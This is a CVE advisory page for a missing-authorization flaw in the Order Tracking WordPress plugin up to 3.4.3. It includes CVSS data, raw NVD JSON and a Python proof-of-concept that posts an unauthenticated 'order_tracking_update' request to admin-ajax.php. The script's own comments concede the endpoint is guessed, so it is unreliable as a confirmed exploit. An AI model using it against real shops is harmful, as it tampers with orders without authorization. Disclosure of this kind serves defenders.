Security Vulnerability Report
中文
CVE-2026-39602 CVSS 5.3 MEDIUM

CVE-2026-39602

Published: 2026-04-08 09:16:29
Last Modified: 2026-04-29 10:17:30

Description

Missing Authorization vulnerability in Rustaurius Order Tracking order-tracking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Order Tracking: from n/a through <= 3.4.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Rustaurius Order Tracking <= 3.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_vulnerability(target_url): """ Exploit Missing Authorization vulnerability in Rustaurius Order Tracking <= 3.4.3 This script attempts to perform an unauthorized action. """ # Example endpoint (actual endpoint may vary based on plugin implementation) # Often vulnerable plugins expose AJAX actions without capability checks exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload attempting to trigger an action without authentication payload = { "action": "order_tracking_update", "status": "delivered", "order_id": "1" } try: # Send request without cookies or authentication headers response = requests.post(exploit_url, data=payload, timeout=10) if response.status_code == 200 and "success" in response.text.lower(): print("[+] Vulnerability confirmed! Unauthorized action performed.") return True else: print("[-] Vulnerability not exploited or endpoint changed.") return False except Exception as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": target = "http://example.com" # Replace with target URL check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39602", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:29.340", "lastModified": "2026-04-29T10:17:30.110", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Rustaurius Order Tracking order-tracking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Order Tracking: from n/a through <= 3.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/order-tracking/vulnerability/wordpress-order-tracking-plugin-3-4-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}